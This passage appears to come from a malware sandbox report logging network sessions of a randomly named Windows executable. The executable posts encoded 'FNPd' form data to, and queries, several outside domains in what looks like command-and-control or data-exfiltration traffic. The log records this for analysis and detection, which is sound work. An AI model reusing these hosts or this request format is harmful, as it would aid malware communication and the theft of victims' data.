                                  Data Raw: 46 4e 50 64 3d 31 56 70 2b 31 46 62 2f 76 30 66 6d 32 67 32 49 47 67 71 37 33 67 64 64 35 4e 43 36 62 62 70 36 71 66 43 2f 32 51 36 77 61 44 79 55 6b 64 63 55 71 4f 68 50 77 41 38 71 4a 2f 49 42 48 39 6e 4b 68 69 55 5a 7a 68 75 30 6b 73 53 43 4a 42 39 58 30 6e 53 78 57 78 6b 62 67 71 42 78 36 39 64 45 6e 58 61 6f 4d 73 74 57 45 70 78 79 70 7a 2b 30 46 77 75 6b 52 4f 62 75 51 39 72 35 58 5a 4c 35 76 42 4f 6c 45 73 72 37 54 6a 67 6d 64 36 51 6c 31 77 77 62 71 4c 49 74 32 67 63 47 4a 45 4f 57 6d 45 39 59 38 6a 56 44 59 76 38 51 4c 33 7a 79 66 54 35 53 70 54 59 35 69 45 6f 43 39 6e 58 35 5a 73 51 6b 6b 78 4c 67 46 30 4c 2b 6c 33 36 6c 35 42 4d 67 63 69 45 6d 45 64 73 61 6b 31 72 61 6e 77 3d 3d
                                  Data Ascii: FNPd=1Vp+1Fb/v0fm2g2IGgq73gdd5NC6bbp6qfC/2Q6waDyUkdcUqOhPwA8qJ/IBH9nKhiUZzhu0ksSCJB9X0nSxWxkbgqBx69dEnXaoMstWEpxypz+0FwukRObuQ9r5XZL5vBOlEsr7Tjgmd6Ql1wwbqLIt2gcGJEOWmE9Y8jVDYv8QL3zyfT5SpTY5iEoC9nX5ZsQkkxLgF0L+l36l5BMgciEmEdsak1ranw==
                                  May 23, 2024 15:21:33.475075960 CEST340INHTTP/1.1 302 Moved Temporarily
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:21:33 GMT
                                  Content-Type: text/html
                                  Content-Length: 154
                                  Connection: close
                                  Location: http://kubanci.ru/3nn5/
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  43192.168.2.649749194.58.112.174803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:35.383677959 CEST1773OUTPOST /3nn5/ HTTP/1.1
                                  Host: www.kubanci.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.kubanci.ru
                                  Referer: http://www.kubanci.ru/3nn5/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 31 56 70 2b 31 46 62 2f 76 30 66 6d 32 67 32 49 47 67 71 37 33 67 64 64 35 4e 43 36 62 62 70 36 71 66 43 2f 32 51 36 77 61 44 36 55 6b 6f 49 55 70 70 64 50 78 41 38 71 57 50 49 45 48 39 6e 79 68 6a 77 64 7a 68 7a 44 6b 75 61 43 49 6a 31 58 38 79 2b 78 59 78 6b 62 75 36 42 79 30 64 64 72 6e 54 2f 67 4d 6f 78 57 45 70 78 79 70 78 57 30 54 52 75 6b 58 4f 62 68 59 64 72 39 64 35 4c 52 76 43 2b 31 45 73 66 4e 54 77 59 6d 64 61 67 6c 32 44 55 62 31 37 49 76 36 41 63 65 4a 45 44 49 6d 45 49 70 38 6a 77 57 59 76 59 51 47 41 4b 4a 4a 53 56 6b 34 41 4a 59 2b 6a 51 46 7a 67 4c 49 5a 4f 4d 6b 73 44 57 58 4e 56 53 52 6e 7a 75 4e 38 41 77 73 64 69 67 38 4f 5a 41 50 71 55 79 31 30 6a 6d 67 6f 33 67 4d 32 76 2f 52 49 42 4c 6e 37 41 62 34 32 70 57 74 36 42 59 71 4a 34 58 79 35 36 44 59 79 6d 6d 6e 73 62 79 31 62 37 31 31 78 74 69 69 66 68 62 7a 72 30 4d 4d 6d 49 53 6f 41 79 65 6c 57 34 30 59 49 6e 5a 52 77 72 36 65 76 54 50 2f 45 41 78 4d 78 4b 43 34 41 62 63 4a 6d 72 51 2b 2b 36 6b 70 33 6f 45 69 57 [TRUNCATED]
                                  Data Ascii: FNPd=1Vp+1Fb/v0fm2g2IGgq73gdd5NC6bbp6qfC/2Q6waD6UkoIUppdPxA8qWPIEH9nyhjwdzhzDkuaCIj1X8y+xYxkbu6By0ddrnT/gMoxWEpxypxW0TRukXObhYdr9d5LRvC+1EsfNTwYmdagl2DUb17Iv6AceJEDImEIp8jwWYvYQGAKJJSVk4AJY+jQFzgLIZOMksDWXNVSRnzuN8Awsdig8OZAPqUy10jmgo3gM2v/RIBLn7Ab42pWt6BYqJ4Xy56DYymmnsby1b711xtiifhbzr0MMmISoAyelW40YInZRwr6evTP/EAxMxKC4AbcJmrQ++6kp3oEiWa5avDru5QgW+icEL8MEyshC16gGim1snsSdk3xxv+l/PiP5IC0Zl0HkrhNUdd0HmQ/Qt8CH+bDc16sZCDOWVxUTOrFyRJ/+wr+KExIuHzIuUlkF9HbtRAVa81/8K3kax3sHayOKB5HdlL/jy8DALKfMEv+Bx/oD6TDNC2+CyiPILgyTtDUypqsSHe3FgVaQD3ABx0q6cd6x5Rwxkj1HkXuBoCxuQJuDyMNccICqQVOqtvm7ydxx/gfrT2oAb24k3+ybc1whjD2McWEDXvkVwkMYuecc74/SYU6MAect6dOTEsfgdWPwCJJ7Yf/3ZRRpshRGJeFCpaTqeBsRlwA/qNA+ut89Uc9pbCFHfZVlEJcXpP4QgTSz5oT7mOGShhloDzkNxmrcOqQ8oUSkLWwjGEZ30seGtdts5fPmcAOR19u/nlZng40HfBhQ5gSUD/b8bDcz9wtU4lxLap8JEVgvjRuX4duu0i5nOWY/VUvuNc+1iK0zFx3YMTUiJfj2UEece/Y0kioKjd+rFhkwXMxjVnF9tceTNniWEctFi1g95ZapYw01lg0ZaYoezT32h2Bgmxh28pFKBkl2W+giwnCkWZvt1qR7qveRA8u9SrswX3Wxg9KEtdI9fESp+cb+JLAk0M2q82r1+DyzXNXEbkvoTSW0Dszyu2CP+ZE [TRUNCATED]
                                  May 23, 2024 15:21:36.066885948 CEST340INHTTP/1.1 302 Moved Temporarily
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:21:35 GMT
                                  Content-Type: text/html
                                  Content-Length: 154
                                  Connection: close
                                  Location: http://kubanci.ru/3nn5/
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  44192.168.2.649750194.58.112.174803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:37.915666103 CEST489OUTGET /3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N+j4TaEXCiYldMk5+wT4RAjeLUuWdfkxSJYkkjl9YjcDipJ/nGSZTJn94UV3fFhn0eiHqMCH7NwlCC8Ww2FTOTnO/H4b47QggKeMo0=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.kubanci.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:21:38.712148905 CEST504INHTTP/1.1 302 Moved Temporarily
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:21:38 GMT
                                  Content-Type: text/html
                                  Content-Length: 154
                                  Connection: close
                                  Location: http://kubanci.ru/3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N+j4TaEXCiYldMk5+wT4RAjeLUuWdfkxSJYkkjl9YjcDipJ/nGSZTJn94UV3fFhn0eiHqMCH7NwlCC8Ww2FTOTnO/H4b47QggKeMo0=&zdK0d=M8mTZ0xHNd1dPVm
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  45192.168.2.6497515.101.153.149803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:43.953802109 CEST763OUTPOST /t96c/ HTTP/1.1
                                  Host: www.dvizhenie-pallet.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.dvizhenie-pallet.ru
                                  Referer: http://www.dvizhenie-pallet.ru/t96c/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 31 46 32 70 2b 35 37 51 78 66 4f 2b 35 6a 52 79 70 55 49 62 6c 56 63 73 38 49 44 37 44 74 67 77 33 56 44 2b 71 75 54 72 76 62 38 6f 59 4e 42 31 33 2b 45 48 33 58 41 38 55 56 4c 51 48 48 39 38 6b 51 4c 4e 79 6e 30 64 34 65 72 53 51 48 6f 65 74 61 49 68 79 51 63 58 5a 76 79 48 31 32 32 70 76 6a 73 4a 73 7a 4e 43 55 36 6c 50 5a 36 69 78 2b 51 54 56 31 35 44 43 7a 78 4e 34 6f 53 78 5a 2b 4c 70 39 44 75 46 2f 4c 78 4e 4b 69 61 58 59 37 39 33 75 52 49 37 75 41 43 75 77 34 36 68 67 43 33 42 39 32 71 63 32 6f 4f 33 75 42 33 73 6f 31 69 50 34 71 74 2b 6d 6d 58 67 4f 43 72 73 36 73 6b 46 39 69 46 36 78 70 33 6f 61
                                  Data Ascii: FNPd=1F2p+57QxfO+5jRypUIblVcs8ID7Dtgw3VD+quTrvb8oYNB13+EH3XA8UVLQHH98kQLNyn0d4erSQHoetaIhyQcXZvyH122pvjsJszNCU6lPZ6ix+QTV15DCzxN4oSxZ+Lp9DuF/LxNKiaXY793uRI7uACuw46hgC3B92qc2oO3uB3so1iP4qt+mmXgOCrs6skF9iF6xp3oa
                                  May 23, 2024 15:21:44.697736979 CEST482INHTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:44 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Content-Encoding: gzip
                                  Data Raw: 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 b0 99 ba 74 c1 43 08 e8 b6 8b 0b 75 2d 9a 1e 3c 46 33 92 40 4d 6b 92 6e d5 5f 6f da 45 f0 32 f0 66 be 79 bc c7 2f ca c7 9d 7c 69 2a b8 97 0f 35 34 ed 5d 7d d8 c1 6a 8d 78 a8 e4 1e b1 94 e5 f9 b2 61 39 62 75 5c 89 8c 9b f8 d1 09 6e 48 e9 24 a2 8d 1d 89 22 2f e0 d8 47 d8 f7 a3 d3 1c cf cb 8c e3 02 f1 d7 5e 7f cf 7f d7 e2 1f 93 54 c6 07 21 0d 81 a7 cf 91 42 24 0d ed 53 0d 93 0a e0 12 f7 3e 73 d0 3b 88 c6 06 08 e4 4f e4 19 c7 61 76 f2 69 28 ad 3d 85 20 6e 07 f5 66 08 37 ac 60 db 2d 5c b6 ce 7e 5d c1 f3 82 83 8a 30 4d 13 d3 27 fb 63 c8 59 5a 0f aa eb 28 32 3f 42 d3 fb 08 37 39 c7 3f 9f 14 77 09 9a a2 cd 05 b3 5f 16 91 e4 31 1b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: edMAK0tCu-<F3@Mkn_oE2fy/|i*54]}jxa9bu\nH$"/G^T!B$S>s;Oavi(= nf7`-\~]0M'cYZ(2?B79?w_10


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  46192.168.2.6497525.101.153.149803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:47.492356062 CEST787OUTPOST /t96c/ HTTP/1.1
                                  Host: www.dvizhenie-pallet.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.dvizhenie-pallet.ru
                                  Referer: http://www.dvizhenie-pallet.ru/t96c/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 31 46 32 70 2b 35 37 51 78 66 4f 2b 35 43 68 79 76 44 38 62 30 46 63 76 69 59 44 37 5a 64 67 38 33 56 50 2b 71 71 44 46 6f 70 59 6f 59 74 78 31 6c 50 45 48 32 58 41 38 62 31 4c 56 61 33 39 4e 6b 51 48 2f 79 6a 38 64 34 65 2f 53 51 47 59 65 73 70 67 69 67 51 63 56 55 50 79 46 6f 6d 32 70 76 6a 73 4a 73 33 6c 6b 55 36 39 50 5a 4b 53 78 2f 7a 4c 57 37 5a 44 42 36 52 4e 34 35 43 78 64 2b 4c 70 62 44 72 63 55 4c 79 31 4b 69 61 48 59 34 76 66 74 65 49 37 6f 50 69 75 2b 30 4a 4a 71 4c 47 77 32 31 70 4d 67 7a 4d 79 4d 41 42 74 79 70 52 50 62 34 39 65 6b 6d 56 34 38 43 4c 73 51 75 6b 39 39 77 53 32 57 6d 44 4e 35 72 35 41 5a 49 53 2f 67 46 34 6d 54 75 64 36 56 63 76 67 43 49 67 3d 3d
                                  Data Ascii: FNPd=1F2p+57QxfO+5ChyvD8b0FcviYD7Zdg83VP+qqDFopYoYtx1lPEH2XA8b1LVa39NkQH/yj8d4e/SQGYespgigQcVUPyFom2pvjsJs3lkU69PZKSx/zLW7ZDB6RN45Cxd+LpbDrcULy1KiaHY4vfteI7oPiu+0JJqLGw21pMgzMyMABtypRPb49ekmV48CLsQuk99wS2WmDN5r5AZIS/gF4mTud6VcvgCIg==
                                  May 23, 2024 15:21:48.243093967 CEST482INHTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:48 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Content-Encoding: gzip
                                  Data Raw: 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 b0 99 ba 74 c1 43 08 e8 b6 8b 0b 75 2d 9a 1e 3c 46 33 92 40 4d 6b 92 6e d5 5f 6f da 45 f0 32 f0 66 be 79 bc c7 2f ca c7 9d 7c 69 2a b8 97 0f 35 34 ed 5d 7d d8 c1 6a 8d 78 a8 e4 1e b1 94 e5 f9 b2 61 39 62 75 5c 89 8c 9b f8 d1 09 6e 48 e9 24 a2 8d 1d 89 22 2f e0 d8 47 d8 f7 a3 d3 1c cf cb 8c e3 02 f1 d7 5e 7f cf 7f d7 e2 1f 93 54 c6 07 21 0d 81 a7 cf 91 42 24 0d ed 53 0d 93 0a e0 12 f7 3e 73 d0 3b 88 c6 06 08 e4 4f e4 19 c7 61 76 f2 69 28 ad 3d 85 20 6e 07 f5 66 08 37 ac 60 db 2d 5c b6 ce 7e 5d c1 f3 82 83 8a 30 4d 13 d3 27 fb 63 c8 59 5a 0f aa eb 28 32 3f 42 d3 fb 08 37 39 c7 3f 9f 14 77 09 9a a2 cd 05 b3 5f 16 91 e4 31 1b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: edMAK0tCu-<F3@Mkn_oE2fy/|i*54]}jxa9bu\nH$"/G^T!B$S>s;Oavi(= nf7`-\~]0M'cYZ(2?B79?w_10


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  47192.168.2.6497535.101.153.149803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:50.024755001 CEST1800OUTPOST /t96c/ HTTP/1.1
                                  Host: www.dvizhenie-pallet.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.dvizhenie-pallet.ru
                                  Referer: http://www.dvizhenie-pallet.ru/t96c/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 31 46 32 70 2b 35 37 51 78 66 4f 2b 35 43 68 79 76 44 38 62 30 46 63 76 69 59 44 37 5a 64 67 38 33 56 50 2b 71 71 44 46 6f 70 51 6f 59 66 35 31 30 63 63 48 31 58 41 38 57 56 4c 55 61 33 39 51 6b 51 66 37 79 6a 78 67 34 61 50 53 52 67 6b 65 72 59 67 69 36 41 63 56 64 76 79 45 31 32 32 38 76 6a 38 4e 73 7a 35 6b 55 36 39 50 5a 4d 2b 78 72 51 54 57 32 35 44 43 7a 78 4e 4f 6f 53 77 36 2b 50 45 67 44 76 42 76 49 43 56 4b 6a 2b 62 59 36 63 33 74 58 49 37 71 49 69 76 34 30 4a 55 77 4c 47 73 4c 31 6f 49 4b 7a 4d 32 4d 43 56 45 58 2f 51 6e 65 75 64 61 39 6c 48 67 4a 4d 4d 4d 59 32 33 78 6e 78 68 53 66 76 42 42 67 70 2f 49 75 47 52 58 6e 45 72 2b 39 78 59 66 6d 55 39 39 34 63 42 4e 4b 6f 63 39 53 75 4a 4c 65 31 4d 55 4a 64 49 69 48 33 78 6b 46 6d 62 6a 2b 6b 54 4a 32 48 38 4c 67 2f 66 69 5a 62 4d 6d 65 51 49 45 6a 76 6b 4e 46 43 6e 34 68 52 32 78 74 6b 5a 41 57 47 56 4a 64 73 39 62 73 78 54 4d 71 61 77 4b 2b 4e 50 69 5a 52 4d 34 44 79 4e 36 54 65 35 41 6a 6c 71 61 77 46 47 56 68 59 43 4f 7a 31 [TRUNCATED]
                                  Data Ascii: FNPd=1F2p+57QxfO+5ChyvD8b0FcviYD7Zdg83VP+qqDFopQoYf510ccH1XA8WVLUa39QkQf7yjxg4aPSRgkerYgi6AcVdvyE1228vj8Nsz5kU69PZM+xrQTW25DCzxNOoSw6+PEgDvBvICVKj+bY6c3tXI7qIiv40JUwLGsL1oIKzM2MCVEX/Qneuda9lHgJMMMY23xnxhSfvBBgp/IuGRXnEr+9xYfmU994cBNKoc9SuJLe1MUJdIiH3xkFmbj+kTJ2H8Lg/fiZbMmeQIEjvkNFCn4hR2xtkZAWGVJds9bsxTMqawK+NPiZRM4DyN6Te5AjlqawFGVhYCOz1/OI3rGD77xOgh0MUPgqqzWszgnz+aMvzWX6OEgKOpuumSEo4CUnberBU0Uy9drpF6VqEFJppy2FONRvc798AuTfv1uo0uHEvtQJLQHgVAnsHooY8qZJYRxEASIJ7pd3DkGJ6nXHaXLqWsTm8klTuS7lnQXlnzATXb3UyXFPvcfHFYSO5G15WoEiEYz/CA1pRr/csXd/uSI3A5/EsRnon4jhj5iLNxOrEN/C3IWjGQaPNiCabO4ctl1uwcWKbyugArOn5Cy47UviEMI6pa6TYmEBACd6e3adZePzJOVFRHuRSjVBqFXNDiQC/dwcngAJ/tZKtZSeG6Hq0xk9RY05uaOT6KMtam+PvYM/GzndqPOktDc1JcRKyhZCwtJP5BSj5UklQppY6K1eLvtaNEw7MSmPChw8/qcY1OqMsD8KdYOFxmgVtLa4fe8kJI3lYAIWsYueX79Do3Rikr8y6wLNZfxfaP7i2OWb2GGLe9z9737SK721jE9HeSeg+Qu1H/CRBTTewgw2bWMWFF3zQpTMOoiuiiD4aO7b+kkBTxE23+seEqNPd5MaEWKO18QwmWxxwnp8tKJUQ0gGmg+tVa1cicVodt8LYUMrnwHSeqvwcUn2kWL0SHXlR5XgRGLvvBZv7wL1xt4bmPusTq6RUs89l7fdhg5gan3gva3 [TRUNCATED]
                                  May 23, 2024 15:21:50.764741898 CEST482INHTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:50 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Content-Encoding: gzip
                                  Data Raw: 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 b0 99 ba 74 c1 43 08 e8 b6 8b 0b 75 2d 9a 1e 3c 46 33 92 40 4d 6b 92 6e d5 5f 6f da 45 f0 32 f0 66 be 79 bc c7 2f ca c7 9d 7c 69 2a b8 97 0f 35 34 ed 5d 7d d8 c1 6a 8d 78 a8 e4 1e b1 94 e5 f9 b2 61 39 62 75 5c 89 8c 9b f8 d1 09 6e 48 e9 24 a2 8d 1d 89 22 2f e0 d8 47 d8 f7 a3 d3 1c cf cb 8c e3 02 f1 d7 5e 7f cf 7f d7 e2 1f 93 54 c6 07 21 0d 81 a7 cf 91 42 24 0d ed 53 0d 93 0a e0 12 f7 3e 73 d0 3b 88 c6 06 08 e4 4f e4 19 c7 61 76 f2 69 28 ad 3d 85 20 6e 07 f5 66 08 37 ac 60 db 2d 5c b6 ce 7e 5d c1 f3 82 83 8a 30 4d 13 d3 27 fb 63 c8 59 5a 0f aa eb 28 32 3f 42 d3 fb 08 37 39 c7 3f 9f 14 77 09 9a a2 cd 05 b3 5f 16 91 e4 31 1b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: edMAK0tCu-<F3@Mkn_oE2fy/|i*54]}jxa9bu\nH$"/G^T!B$S>s;Oavi(= nf7`-\~]0M'cYZ(2?B79?w_10


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  48192.168.2.6497545.101.153.149803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:52.561395884 CEST498OUTGET /t96c/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=4HeJ9NLv0sXxrw0DzDAC1WoSlNK9MN8e7k2kqtvkuL0qZpE735Fp+TMdSC/xJF1XoX+msXZD9KWOaF8gkpoi/zU8Ecilk3SCpDE4oxEYJqxSeKyI7QDD26ritGREhwxOgv5PBbM= HTTP/1.1
                                  Host: www.dvizhenie-pallet.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:21:53.305222988 CEST486INHTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:53 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Content-Length: 283
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 76 69 7a 68 65 6e 69 65 2d 70 61 6c 6c 65 74 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.dvizhenie-pallet.ru Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  49192.168.2.64975592.118.24.161803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:58.470715046 CEST766OUTPOST /xaki/ HTTP/1.1
                                  Host: www.szandraromanovics.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.szandraromanovics.hu
                                  Referer: http://www.szandraromanovics.hu/xaki/
